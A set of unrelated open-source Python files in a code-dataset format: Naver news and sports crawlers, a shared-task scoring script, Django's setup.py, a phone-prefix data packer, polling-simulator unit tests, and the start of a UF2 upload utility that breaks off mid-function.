url = category_url + str(year) + str(month) + str(month_day)
                    # find totalpage by exploiting Naver's page layout: request page=10000,
                    # which does not exist, so Naver redirects to page=totalpage
totalpage = ArticleParser.find_news_totalpage(url + "&page=10000")
for page in range(1, totalpage + 1):
made_urls.append(url + "&page=" + str(page))
return made_urls
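    # Editor's note (not in the original source): each generated URL has the shape
    # <category_url>YYYYMMDD&page=N, e.g. for 2018-04-01 this yields
    # "...&date=20180401&page=1", "...&page=2", ... up to the total page count
    # discovered via the page=10000 redirect trick above.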
@staticmethod
def get_url_data(url, max_tries=10):
remaining_tries = int(max_tries)
while remaining_tries > 0:
try:
headers1 = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
return requests.get(url, headers=headers1)
            except requests.exceptions.RequestException:
sleep(60)
remaining_tries = remaining_tries - 1
raise ResponseTimeout()
def crawling(self, category_name):
# Multi Process PID
print(category_name + " PID: " + str(os.getpid()))
writer = Writer(category_name=category_name, date=self.date)
        # article list URL format
if (category_name == "연합뉴스속보"):
url = "http://news.naver.com/main/list.nhn?mode=LPOD&mid=sec&sid1=001&sid2=140&oid=001&isYeonhapFlash=Y" \
+ "&date="
else:
url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(
self.categories.get(category_name)) + "&date="
        # collect articles from start_year/start_month through end_year/end_month
day_urls = self.make_news_page_url(url, self.date['start_year'], self.date['end_year'], self.date['start_month'], self.date['end_month'])
print(category_name + " Urls are generated")
print("The crawler starts")
for URL in day_urls:
print(URL)
            regex = re.compile(r"date=(\d+)")
news_date = regex.findall(URL)[0]
request = self.get_url_data(URL)
document = BeautifulSoup(request.content, 'html.parser')
# html - newsflash_body - type06_headline, type06
            # fetch the articles listed on this page
if (category_name == "연합뉴스속보"):
post_temp = document.select('.newsflash_body .type02 li ')
else:
post_temp = document.select('.newsflash_body .type06_headline li dl')
post_temp.extend(document.select('.newsflash_body .type06 li dl'))
            # store the URLs of the articles on this page
post = []
headlines = []
companys = []
for line in post_temp:
                post.append(line.a.get('href'))  # put the URL of every article on this page into the post list
try:
companys.append(line.find('span', class_="writing").text)
except:
companys.append("err")
try:
h = line.find_all('a')
if len(h) > 1:
headlines.append(h[1].text)
elif len(h) == 1:
headlines.append(h[0].text)
else:
headlines.append("err")
except:
headlines.append("err")
del post_temp
print(len(post))
            for i in range(len(post)):  # article URLs
                # crawl delay
print(i)
sleep(0.01)
content_url = post[i]
                # fetch the article HTML
try:
article = Article(content_url, language='ko')
article.download()
article.parse()
text_sentence = article.text.strip()
text_company = companys[i]
text_headline = headlines[i].strip()
######################################################################
if self.keyword == 'initvalue':
wcsv = writer.get_writer_csv()
wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url])
else:
headline_to_words = text_headline.split()
                        if self.keyword in headline_to_words:
wcsv = writer.get_writer_csv()
wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url])
######################################################################
except Exception as err:
print(err)
writer.close()
return
def start(self, isMultiProc):
        # start multi-process crawling
for category_name in self.selected_categories:
if isMultiProc:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
else:
self.crawling(category_name)
if __name__ == "__main__":
Crawler = ArticleCrawler()
#Crawler.set_category("생활문화", "IT과학")
#Crawler.set_date_range(2017, 1, 2018, 4)
    Crawler.start(isMultiProc=True)
``` |
{
"source": "20-2-SKKU-OSS/2020-OSS-2-11",
"score": 3
} |
#### File: 2020-OSS-2-11/_KoreaNewsCrawler/sportcrawler.py
```python
from bs4 import BeautifulSoup
from time import sleep
import calendar
import csv
import requests
import re
import json
from exceptions import *
from multiprocessing import Process
class SportCrawler:
def __init__(self):
self.category = {'한국야구': "kbaseball",'해외야구': "wbaseball",'해외축구' : "wfootball",
'한국축구': "kfootball", '농구': "basketball", '배구': "volleyball", '일반 스포츠': "general", 'e스포츠': "esports"}
self.selected_category = []
self.selected_urlcategory=[]
self.date = {'startyear': 0,'startmonth':0, 'endyear': 0, 'endmonth': 0}
def javascript_totalpage(self, url):
totalpage_url = url +"&page=10000"
request_content = requests.get(totalpage_url,headers={'User-Agent':'Mozilla/5.0'})
pagenumber = re.findall('\"totalPages\":(.*)}',request_content.text)
return int(pagenumber[0])
def content(self, html_document, url_label):
label = url_label
content_match = []
Tag = html_document.find_all('script', {'type': 'text/javascript'})
Tag_ = re.sub(',"officeName', '\nofficeName', str(Tag))
regex = re.compile('oid":"(?P<oid>\d+)","aid":"(?P<aid>\d+)"')
content = regex.findall(Tag_)
for oid_aid in content:
maked_url = "https://sports.news.naver.com/" + label + "/news/read.nhn?oid=" + oid_aid[0] + "&aid=" + \
oid_aid[1]
content_match.append(maked_url)
return content_match
def Clearcontent(self, text):
remove_special = re.sub('[\{\}\[\]\/?,;:|\)*~`!^\-_+<>@\#$%&n▲▶◆◀■\\\=\(\'\"]', '', text)
remove_author = re.sub('\w\w\w 기자', '', remove_special)
remove_flasherror = re.sub(
'본문 내용|TV플레이어| 동영상 뉴스|flash 오류를 우회하기 위한 함수 추가fuctio flashremoveCallback|tt|t|앵커 멘트|xa0', '', remove_author)
        remove_strip = remove_flasherror.strip().replace(' ', '')  # remove stray whitespace
        reverse_content = ''.join(reversed(remove_strip))  # reverse the article text
cleared_content = ''
for i in range(0, len(remove_strip)):
if reverse_content[
                i:i + 2] == '.다':  # the reversed article ends with ".다", so scan for it to drop everything after the last sentence
cleared_content = ''.join(reversed(reverse_content[i:]))
break
cleared_content=re.sub('if deployPhase(.*)displayRMCPlayer ','',cleared_content)
return cleared_content
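    # Editor's note: Clearcontent trims everything after the last complete sentence.
    # The text is reversed, so the final "다." of the last sentence appears as ".다";
    # scanning the reversed string for ".다" and re-reversing from that index keeps
    # only the text up to and including the last sentence.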
def Clearheadline(self, text):
first = re.sub('[\{\}\[\]\/?,;:|\)*~`!^\-_+<>@\#$%&n▲▶◆◀■\\\=\(\'\"]', '', text)
return first
def Make_url(self, URL, startyear, lastyear, startmonth, lastmonth):
Maked_url = []
final_startmonth = startmonth
final_lastmonth = lastmonth
for year in range(startyear, lastyear + 1):
if year != lastyear:
startmonth = 1
lastmonth = 12
else:
startmonth = final_startmonth
lastmonth = final_lastmonth
for Month in range(startmonth, lastmonth + 1):
for Month_Day in range(1, calendar.monthrange(year, Month)[1] + 1):
url = URL
if len(str(Month)) == 1:
Month = "0" + str(Month)
if len(str(Month_Day)) == 1:
Month_Day = "0" + str(Month_Day)
url = url + str(year) + str(Month) + str(Month_Day)
                    final_url = url  # keep the date-only URL before the page parameter is appended
                    totalpage = self.javascript_totalpage(url)  # look up the total page count
for page in range(1, totalpage + 1):
                        url = final_url  # reset to the date-only URL
url = url + "&page=" + str(page)
                        Maked_url.append(url)  # [page1, page2, page3, ...]
return Maked_url
def crawling(self, category_name):
Url_category = []
Category = []
Category.append(category_name)
Url_category.append(self.category[category_name])
titlescript = []
officename_script = []
completed_content_match = []
timescript=[]
        for url_label in Url_category:  # URL categories; with multiprocessing this loops only once, so it could be refactored
            category = Category[Url_category.index(url_label)]  # URL index and Category index line up, so the values match
url = "https://sports.news.naver.com/" + url_label + "/news/list.nhn?isphoto=N&view=photo&date="
final_urlday = self.Make_url(url,self.date['startyear'],
self.date['endyear'], self.date['startmonth'], self.date['endmonth'])
print("succeed making url")
if len(str(self.date['startmonth'])) == 2:
startmonth=str(self.date['startmonth'])
else:
startmonth='0'+str(self.date['startmonth'])
if len(str(self.date['endmonth']))==2:
endmonth=str(self.date['endmonth'])
else:
endmonth='0'+str(self.date['endmonth'])
file = open("Sport_" + category + "_"+str(self.date['startyear'])+str(startmonth)
+"_"+str(self.date['endyear'])+str(endmonth)+".csv", 'w', encoding='euc-kr', newline='')
wcsv = csv.writer(file)
hefscript2=[]
            for list_page in final_urlday:  # URLs already carrying category, year, month, day and page
                # titles / URLs
request_content = requests.get(list_page, headers={'User-Agent': 'Mozilla/5.0'})
content_dict = json.loads(request_content.text)
hefscript = []
for contents in content_dict["list"]:
oid = contents['oid']
aid = contents['aid']
titlescript.append(contents['title'])
timescript.append(contents['datetime'])
hefscript.append("https://sports.news.naver.com/news.nhn?oid=" + oid + "&aid=" + aid)
hefscript2.append("https://sports.news.naver.com/news.nhn?oid=" + oid + "&aid=" + aid)
officename_script.append(contents['officeName'])
                # article body
                # for each content page, put the body text into text_sentence, run Clearcontent on it,
                # then append the result to completed_content_match; the press (office) name is collected as well
for content_page in hefscript:
sleep(0.01)
content_request_content = requests.get(content_page, headers={'User-Agent': 'Mozilla/5.0'})
content_document_content = BeautifulSoup(content_request_content.content, 'html.parser')
content_Tag_content = content_document_content.find_all('div', {'class': 'news_end'},
{'id': 'newsEndContents'})
                    text_sentence = ''  # reset the article body text
try:
text_sentence = text_sentence + str(content_Tag_content[0].find_all(text=True))
completed_content_match.append(self.Clearcontent(text_sentence))
except:
pass
                # write the CSV rows
for csvtimeline, csvheadline, csvcontent, csvpress, csvurl in zip(timescript,titlescript, completed_content_match, officename_script,hefscript2):
try:
if not csvtimeline:
continue
if not csvheadline:
continue
if not csvcontent:
continue
if not csvpress:
continue
wcsv.writerow([csvtimeline, self.Clearheadline(csvheadline), csvcontent, csvpress, category,csvurl])
except:
pass
file.close()
def set_category(self, *args):
for key in args:
if self.category.get(key) is None:
raise InvalidCategory(key)
self.selected_category = args
for selected in self.selected_category:
self.selected_urlcategory.append(self.category[selected])
def start(self):
        # start multi-process crawling
for category_name in self.selected_category:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
def set_date_range(self,a,b,c,d):
self.date['startyear'] = a
self.date['startmonth'] = b
self.date['endyear'] = c
self.date['endmonth'] = d
# Main
if __name__ == "__main__":
Spt_crawler = SportCrawler()
Spt_crawler.set_category('한국야구','한국축구')
Spt_crawler.set_date_range(2017,4,2018,1)
Spt_crawler.start()
``` |
{
"source": "2030NLP/SpatialCognEval2021",
"score": 3
} |
#### File: SpatialCognEval2021/ref/evaluate.py
```python
import json
def formatter(_data, _meta):
"""
    Convert the data into the format used for submission and scoring.
    :param _data:
        follows the format of the [x]-[set]-with-answer.json files in the reference dataset:
        use the participating system to add judge1 and/or judge2 fields to the objects read from
        [x]-[dev/test].json, then put all data from the three tasks' dev (or test) sets,
        with the answer fields added, into a single List to form this parameter.
    :param _meta: key information about the participating team, shown on the leaderboard.
    :return: data in the format used for submission and scoring, referred to as the "answer sheet".
"""
_sheet = {'meta': {
        'team_name': _meta['team_name'],  # team name
        'institution': _meta['institution'],  # institution (short name)
        'email': _meta['email'],  # contact email
}}
_methods = {
'1': lambda _item: int(_item['judge1']),
'2': lambda _item: int(_item['judge2']),
'3': lambda _item: [int(_item['judge1']), int(_item['judge2'])],
}
for _item in _data:
_task_id, _set_type, _item_id = _item['qID'].split('-')
_key = f"subtask{_task_id}-{_set_type}"
if (_set_type == 'dev' or _set_type == 'val' or _set_type == 'test') and _key not in _sheet:
_sheet[_key] = {}
_sheet[_key][_item_id] = _methods[_task_id](_item)
# print(_sheet)
# print(json.dumps(_sheet, ensure_ascii=False))
return json.dumps(_sheet)
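# A minimal sketch of the submission sheet produced by formatter() (editor's illustration;
# the item ids and judgements below are made up):
# {
#   "meta": {"team_name": "...", "institution": "...", "email": "..."},
#   "subtask1-dev": {"0001": 1, "0002": 0},
#   "subtask3-dev": {"0001": [0, 1]}
# }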
def subtask1_eval(_answers, _ref):
"""
    Scoring function for subtask 1.
    :param _answers: answers from the submitted sheet.
    :param _ref: the reference (gold) answers.
    :return: a statistics object.
"""
_map = {
'11': 'TP',
'00': 'TN',
'10': 'FN',
'01': 'FP',
}
_st = {
'TP': 0,
'TN': 0,
'FN': 0,
'FP': 0,
}
for _k, _v in _ref.items():
_ga = int(_v)
_aa = int(_answers[_k]) if _k in _answers else 0
_st[_map[f"{_ga}{_aa}"]] += 1
_st['Accuracy'] = (_st['TP'] + _st['TN']) / (_st['TP'] + _st['FP'] + _st['FN'] + _st['TN'])
return _st
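# Tiny worked example (editor's note): with _ref = {"1": 1, "2": 0, "3": 1} and
# _answers = {"1": 1, "2": 1}, item "3" falls back to 0, giving TP=1, FP=1, FN=1, TN=0
# and Accuracy = 1/3.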
def subtask2_eval(_answers, _ref):
"""
    Scoring function for subtask 2; same algorithm as subtask 1.
    :param _answers: answers from the submitted sheet.
    :param _ref: the reference (gold) answers.
    :return: a statistics object.
"""
return subtask1_eval(_answers, _ref)
def subtask3_eval(_answers, _ref):
"""
    Scoring function for subtask 3.
    :param _answers: answers from the submitted sheet.
    :param _ref: the reference (gold) answers.
    :return: a statistics object.
"""
_map_1 = {
'11': 'TP_1',
'00': 'TN_1',
'10': 'FN_1',
'01': 'FP_1',
}
_map_2 = {
'11': 'TP_2',
'00': 'TN_2',
# '10': 'FN_2',
# '01': 'FP_2',
}
_st = {
'TP_1': 0,
'TN_1': 0,
'FN_1': 0,
'FP_1': 0,
'TP_2': 0,
'TN_2': 0,
# 'FN_2': 0,
# 'FP_2': 0,
}
for _k, _v in _ref.items():
_ga = int(_v[0])
_aa = int(_answers[_k][0]) if _k in _answers else 0
_st[_map_1[f"{_ga}{_aa}"]] += 1
_gb = int(_v[1])
_ab = int(_answers[_k][1]) if _k in _answers else 0
if _aa == 0 == _ga and _gb == _ab:
_st[_map_2[f"{_gb}{_ab}"]] += 1
_st['Precision'] = (_st['TP_2'] + _st['TN_2']) / (_st['TN_1'] + _st['FN_1']) \
if (_st['TN_1'] + _st['FN_1']) != 0 else 0
_st['Recall'] = (_st['TP_2'] + _st['TN_2']) / (_st['TN_1'] + _st['FP_1']) \
if (_st['TN_1'] + _st['FP_1']) != 0 else 0
_st['F1'] = 2 * _st['Precision'] * _st['Recall'] / (_st['Precision'] + _st['Recall']) \
if (_st['Precision'] + _st['Recall']) != 0 else 0
return _st
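# Reading of the code above (editor's note): judge2 is only scored on items whose gold
# judge1 is 0 and whose submitted judge1 is also 0, and only when the two judge2 values
# agree (TP_2/TN_2). Precision divides those hits by all items the system labelled
# judge1 == 0 (TN_1 + FN_1), Recall divides by all items whose gold judge1 is 0
# (TN_1 + FP_1), and F1 is their harmonic mean.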
def evaluate(_sheet, _ref1, _ref2, _ref3):
_result = {
'meta': _sheet['meta'],
'subtask1': subtask1_eval(_sheet['subtask1-dev'], _ref1),
'subtask2': subtask2_eval(_sheet['subtask2-dev'], _ref2),
'subtask3': subtask3_eval(_sheet['subtask3-dev'], _ref3),
}
return _result
if __name__ == '__main__':
#
dev_or_test = 'dev' # or 'test'
meta = {
'team_name': "某某队", # 队伍名称
'institution': "某某大学", # 机构(简称)
'email': "<EMAIL>", # 联系邮箱
}
#
my_path_1 = f'/YOUR/PATH/OF/task1-{dev_or_test}-with-answer.json'
my_path_2 = f'/YOUR/PATH/OF/task2-{dev_or_test}-with-answer.json'
my_path_3 = f'/YOUR/PATH/OF/task3-{dev_or_test}-with-answer.json'
answers = []
for path in [my_path_1, my_path_2, my_path_3]:
with open(path, 'r', encoding='utf-8') as f:
task_answers = json.loads(f.read())
answers += task_answers
sheet = json.loads(formatter(answers, meta))
#
ref_path_1 = f'/PATH/OF/task1-{dev_or_test}-with-answer.json'
ref_path_2 = f'/PATH/OF/task2-{dev_or_test}-with-answer.json'
ref_path_3 = f'/PATH/OF/task3-{dev_or_test}-with-answer.json'
answers = []
for path in [ref_path_1, ref_path_2, ref_path_3]:
with open(path, 'r', encoding='utf-8') as f:
task_answers = json.loads(f.read())
answers += task_answers
refs = json.loads(formatter(answers, meta))
#
that = evaluate(sheet, refs[f'subtask1-{dev_or_test}'], refs[f'subtask2-{dev_or_test}'], refs[f'subtask3-{dev_or_test}'])
print(that)
pass
``` |
{
"source": "2032341565/django",
"score": 2
} |
#### File: 2032341565/django/setup.py
```python
import os
import sys
from distutils.sysconfig import get_python_lib
from setuptools import find_packages, setup
CURRENT_PYTHON = sys.version_info[:2]
REQUIRED_PYTHON = (3, 6)
# This check and everything above must remain compatible with Python 2.7.
if CURRENT_PYTHON < REQUIRED_PYTHON:
sys.stderr.write("""
==========================
Unsupported Python version
==========================
This version of Django requires Python {}.{}, but you're trying to
install it on Python {}.{}.
This may be because you are using a version of pip that doesn't
understand the python_requires classifier. Make sure you
have pip >= 9.0 and setuptools >= 24.2, then try again:
$ python -m pip install --upgrade pip setuptools
$ python -m pip install django
This will install the latest version of Django which works on your
version of Python. If you can't upgrade your pip (or Python), request
an older version of Django:
$ python -m pip install "django<2"
""".format(*(REQUIRED_PYTHON + CURRENT_PYTHON)))
sys.exit(1)
# Warn if we are installing over top of an existing installation. This can
# cause issues where files that were deleted from a more recent Django are
# still present in site-packages. See #18115.
overlay_warning = False
if "install" in sys.argv:
lib_paths = [get_python_lib()]
if lib_paths[0].startswith("/usr/lib/"):
# We have to try also with an explicit prefix of /usr/local in order to
# catch Debian's custom user site-packages directory.
lib_paths.append(get_python_lib(prefix="/usr/local"))
for lib_path in lib_paths:
existing_path = os.path.abspath(os.path.join(lib_path, "django"))
if os.path.exists(existing_path):
# We note the need for the warning here, but present it after the
# command is run, so it's more likely to be seen.
overlay_warning = True
break
EXCLUDE_FROM_PACKAGES = ['django.conf.project_template',
'django.conf.app_template',
'django.bin']
# Dynamically calculate the version based on django.VERSION.
version = __import__('django').get_version()
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
setup(
name='Django',
version=version,
python_requires='>={}.{}'.format(*REQUIRED_PYTHON),
url='https://www.djangoproject.com/',
author='Django Software Foundation',
author_email='<EMAIL>',
description=('A high-level Python Web framework that encourages '
'rapid development and clean, pragmatic design.'),
long_description=read('README.rst'),
license='BSD',
packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
include_package_data=True,
scripts=['django/bin/django-admin.py'],
entry_points={'console_scripts': [
'django-admin = django.core.management:execute_from_command_line',
]},
install_requires=['pytz', 'sqlparse'],
extras_require={
"bcrypt": ["bcrypt"],
"argon2": ["argon2-cffi >= 16.1.0"],
},
zip_safe=False,
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
project_urls={
'Documentation': 'https://docs.djangoproject.com/',
'Funding': 'https://www.djangoproject.com/fundraising/',
'Source': 'https://github.com/django/django',
'Tracker': 'https://code.djangoproject.com/',
},
)
if overlay_warning:
sys.stderr.write("""
========
WARNING!
========
You have just installed Django over top of an existing
installation, without removing it first. Because of this,
your install may now include extraneous files from a
previous version that have since been removed from
Django. This is known to cause a variety of problems. You
should manually remove the
%(existing_path)s
directory and re-install Django.
""" % {"existing_path": existing_path})
``` |
{
"source": "20326/packme",
"score": 3
} |
#### File: 20326/packme/phone_pack.py
```python
import argparse
import os
import struct
import codecs
import csv
import collections
from datetime import datetime
__author__ = 'brian'
__version__ = '1.0.0'
class DataConverter(object):
table = collections.OrderedDict()
tableData = collections.OrderedDict()
def __init__(self, cvs_file=None, out_file=None, version=None):
self.head_fmt = "<4si"
self.phone_fmt = "<iiB"
self.head_fmt_length = struct.calcsize(self.head_fmt)
self.phone_fmt_length = struct.calcsize(self.phone_fmt)
self.first_index_offset = 0
self.phone_record_count = 0
self.cvs_file = cvs_file
self.out_file = out_file
self.dat_version = str(version)
self.carriers = {
"移动": 1,
"联通": 2,
"电信": 3,
"中国移动": 1,
"中国联通": 2,
"中国电信": 3,
"电信虚拟运营商": 4,
"联通虚拟运营商": 5,
"移动虚拟运营商": 6,
"未知电信运营商": 7,
}
if cvs_file is None:
self.cvs_file = os.path.join(os.path.dirname(__file__), "mobile.1810.csv")
# index offset
index_offset = self.head_fmt_length
with codecs.open(self.cvs_file, mode='r') as FILE:
reader = csv.reader(FILE)
for row in reader:
self.phone_record_count = self.phone_record_count + 1
# if self.phone_record_count >10:
# break
                # no  prefix   province  city  carrier   region  zipCode
                # 1   1300000  山东      济南   中国联通   531     250000
                # Each record in the record area has the form "<province>|<city>|<zip code>|<area code>\0" and ends with '\0';
                # each record in the index area has the form "<7-digit phone prefix><record-area offset><card type>" and is 9 bytes long.
no = int(row[1])
carrier = self.carriers.get(row[4], 7)
dat_str = "{}|{}|{}|{}\0".format(row[2], row[3], row[6], str(row[5]))
idx_name = "{}.{}.{}".format(row[0], row[1], row[6])
self.table[no] = {
"no": no,
"carrier": carrier,
"data": dat_str,
}
self.tableData[dat_str] = 0
def pack(self):
        # ### phone number region lookup (phone.dat layout)
        # | 4 bytes |  <- phone.dat version (e.g. 1701 means January 2017)
        # ------------
        # | 4 bytes |  <- offset of the first index entry
        # -----------------------
        # | offset - 8 |  <- record area
        # -----------------------
        # |    index    |  <- index area
        # -----------------------
        #
        # 1. The header is 8 bytes: 4 bytes for the version and 4 bytes for the offset of the first index entry;
        # 2. each record in the record area has the form "<province>|<city>|<zip code>|<area code>\0" and ends with '\0';
        # 3. each index entry has the form "<7-digit phone prefix><record-area offset><card type>" and is 9 bytes long.
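        # Illustrative (commented-out) sketch of reading the packed file back;
        # the file name and read sizes below are assumptions for demonstration,
        # not part of this tool:
        #   with open("phone.dat", "rb") as fp:
        #       version, first_index_offset = struct.unpack("<4si", fp.read(8))
        #       fp.seek(first_index_offset)
        #       prefix, record_offset, card_type = struct.unpack("<iiB", fp.read(9))
        #       fp.seek(record_offset)
        #       record = fp.read(64).split(b"\0")[0].decode("utf-8")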
with open(self.out_file, "wb") as FILE:
# pack data
            # many records repeat, so the record area is merged/de-duplicated
data_buffer = b''
index_offset = self.head_fmt_length
for key, value in self.tableData.items():
                # compute the index offset
self.tableData[key] = index_offset
index_offset = index_offset + len(key)
                # assemble the record-area data
data_buffer += struct.pack(str(len(key)) + "s", key)
            # set the first-index offset
self.first_index_offset = index_offset
# pack header
header_buffer = struct.pack(self.head_fmt, self.dat_version.encode('utf-8'), self.first_index_offset)
# write buffer
FILE.write(header_buffer)
FILE.write(data_buffer)
# pack index
for key, value in self.table.items():
data_offset = self.tableData[value["data"]]
index_buffer = struct.pack(self.phone_fmt, value["no"], data_offset, value["carrier"])
FILE.write(index_buffer)
def version(self):
print("Version: {}".format(self.dat_version))
print("File: {}".format(self.out_file))
print("Size: {}".format(os.path.getsize(self.out_file)))
print("Count: {}".format(self.phone_record_count))
def cmdline_parser():
defaultVersion = datetime.now().strftime('%y%m')
    parser = argparse.ArgumentParser(description=u'PackMe: generate the phone.dat data file')
    parser.add_argument('-i', '--input', metavar=u'file', help=u'path to the source csv file', required=True)
    parser.add_argument('-o', '--output', metavar=u'file', help=u'output path for the generated phone.dat file',
                        default="phone.{}.dat".format(defaultVersion), required=False)
    parser.add_argument('-v', '--version', metavar=u'2010', help=u'version number', type=int,
                        default=defaultVersion, required=False)
return parser
def main():
parser = cmdline_parser()
args = parser.parse_args()
pp = DataConverter(args.input, args.output, args.version)
pp.pack()
pp.version()
if __name__ == '__main__':
main()
``` |
{
"source": "2039/polling_simulator",
"score": 3
} |
#### File: 2039/polling_simulator/test.py
```python
import argparse
import unittest
from random import seed
from polling import poll, votes, Population, Tally, sigma
from collections import Counter
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--test", default=[], type=int, nargs="*", help="Run given tests.")
parser.add_argument("-s", "--seed", default=0, type=int, help="Set seed.")
options = parser.parse_args()
# ===
class Test_Population(unittest.TestCase):
def setUp(self):
self.pop_dict = {
"a" : 10,
"b" : 20,
"c" : 30,
}
self.empty = Population({})
self.pop = Population(self.pop_dict)
def test_weights(self):
self.assertEqual(self.empty.weights, ())
self.assertEqual(self.pop.weights, tuple(self.pop_dict.values()))
def test_groups(self):
self.assertEqual(self.empty.groups, ())
self.assertEqual(self.pop.groups, tuple(self.pop_dict.keys()))
def test_size(self):
self.assertEqual(self.empty.size, 0)
self.assertEqual(self.pop.size, 60)
def test_len(self):
self.assertEqual(len(self.empty), 0)
self.assertEqual(len(self.pop), 3)
def test_vars(self):
self.assertEqual(vars(self.empty), {})
self.assertEqual(vars(self.pop), self.pop_dict)
def test_getter(self):
self.assertEqual(self.pop["a"], 10)
self.assertEqual(self.pop["b"], 20)
self.assertEqual(self.pop["c"], 30)
def test_p(self):
self.assertEqual(self.pop.p("a"), 10/60)
self.assertEqual(self.pop.p("b"), 20/60)
self.assertEqual(self.pop.p("c"), 30/60)
def test_iterable(self):
for g1, g2 in zip(self.pop, self.pop_dict):
self.assertEqual(g1, g2)
def test_contains(self):
for group in self.pop_dict:
group in self.pop
class Test_Voting(unittest.TestCase):
def setUp(self):
seed(options.seed)
self.votes = votes
def test_empty(self):
population = Population(dict())
vote_count = sum(1 for _vote in self.votes(population, 0))
self.assertEqual(vote_count, 0)
def test_sample(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
for vote in self.votes(population, 5):
self.assertIn(vote, population.groups)
class Test_Tallying(unittest.TestCase):
def setUp(self):
seed(options.seed)
self.Tally = Tally
def test_empty(self):
population = Population(dict())
tally_count = sum(1 for _tally in self.Tally(population, 0, 1))
self.assertEqual(tally_count, 0)
def test_sample(self):
population = Population({
"a" : 20,
"b" : 40,
"c" : 60,
})
N, n = 74, 3
tallies = list(self.Tally(population, N, n))
counts = [sum(tally.values()) for tally in tallies]
self.assertEqual(counts, [25, 25, 24])
self.assertEqual(len(tallies), n)
class Test_Poll_With_Replacement(unittest.TestCase):
def setUp(self):
seed(options.seed)
from functools import partial
self.poll = partial(poll, without_replacement=False)
def test_empty(self):
population = Population(dict())
self.assertEqual(self.poll(population, 0), Counter())
def test_poll_N(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
for N in (3, 7, 31):
polling = self.poll(population, N)
votes = sum(polling.values())
self.assertEqual(votes, N)
def test_uniqueness(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
poll1 = self.poll(population, 15)
poll2 = self.poll(population, 15)
# Probabilistic test
self.assertNotEqual(poll1, poll2)
def test_poll_all(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
N = sum(population.weights)
polling = self.poll(population, N)
# Probabilistic test
self.assertNotEqual(polling, Counter(vars(population)))
self.assertEqual(polling.keys(), vars(population).keys())
class Test_Poll_Without_Replacement(unittest.TestCase):
def setUp(self):
seed(options.seed)
from functools import partial
self.poll = partial(poll, without_replacement=True)
def test_empty(self):
population = Population(dict())
self.assertEqual(self.poll(population, 0), Counter())
def test_poll_N(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
for N in (3, 7, 31):
polling = self.poll(population, N)
votes = sum(polling.values())
self.assertEqual(votes, N)
def test_uniqueness(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
poll1 = self.poll(population, 15)
poll2 = self.poll(population, 15)
# Probabilistic test
self.assertNotEqual(poll1, poll2)
def test_poll_all(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
N = sum(population.weights)
polling = poll(population, N, without_replacement=True)
self.assertEqual(polling, Counter(vars(population)))
class Test_Variance(unittest.TestCase):
def test_simple(self):
args_result = {
(0.0,) : 0.0,
(0.1,) : 0.30000000000000004,
(0.3,) : 0.458257569495584,
(0.5,) : 0.5,
(1.0,) : 0.0,
}
for args, result in args_result.items():
self.assertEqual(sigma(*args), result)
def test_multiple(self):
args_result = {
(0.0, 1) : 0.0,
(0.1, 3) : 0.17320508075688773,
(0.3, 20) : 0.10246950765959598,
(0.5, 90) : 0.05270462766947299,
(1.0, 999) : 0.0,
}
for args, result in args_result.items():
self.assertEqual(sigma(*args), result)
def test_fpc(self):
args_result = {
(0.0, 1, 20) : 0.0,
(0.1, 3, 20) : 0.16383560438182507,
(0.3, 20, 20) : 0.0,
(0.5, 90, 100) : 0.0167506302543202,
(1.0, 999, 1000) : 0.0,
}
for args, result in args_result.items():
self.assertEqual(sigma(*args), result)
tests = [
Test_Population,
Test_Voting,
Test_Tallying,
Test_Poll_With_Replacement,
Test_Poll_Without_Replacement,
Test_Variance,
]
tests = [tests[t-1] for t in options.test]
runner = unittest.TextTestRunner()
for test in tests:
test_suite = unittest.defaultTestLoader.loadTestsFromTestCase(test)
result = runner.run(test_suite)
``` |
{
"source": "203Electronics/UF2-Upload",
"score": 3
} |
#### File: 203Electronics/UF2-Upload/uf2upload.py
```python
import shutil
import re
import argparse
from os.path import exists
import sys
try:
import psutil
except:
print("psutil not installed, run \"pip install psutil\"")
sys.exit(1)
print("UF2-Upload V1.0\nCopyright 2022 203 Electronics.\n");
parser = argparse.ArgumentParser(description='Host utilts for UF2 Bootloader Devices - 203 Electronics, 2022')
parser.add_argument('-f', metavar='<file path>', type=ascii,
help='UF2 file to upload to target')
parser.add_argument('-d', metavar='<device name>', type=ascii,
help='Target UF2 Device name (Model in INFO_UF2.TXT)')
parser.add_argument('-r', action='store_true',
help='Repeat upload for matched UF2 devices')
parser.add_argument('-l', action='store_true',
help='List all matched UF2 devices')
args = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
class uf2:
mountpoint = None
info = None
model = None
board_id = None
date = None
def __repr__(self):
return f"UF2(mountpoing='{self.mountpoint}'. info='{self.info}', model='{self.model}', board_id='{self.board_id}', date='{self.date}'"
def get_uf2_drives(name = None):
if name:
name = name.replace("\'", "").replace("\"", "")
drives = list(filter(lambda x: 'removable' in x.opts, psutil.disk_partitions()))
uf2_devices = []
for drive in drives:
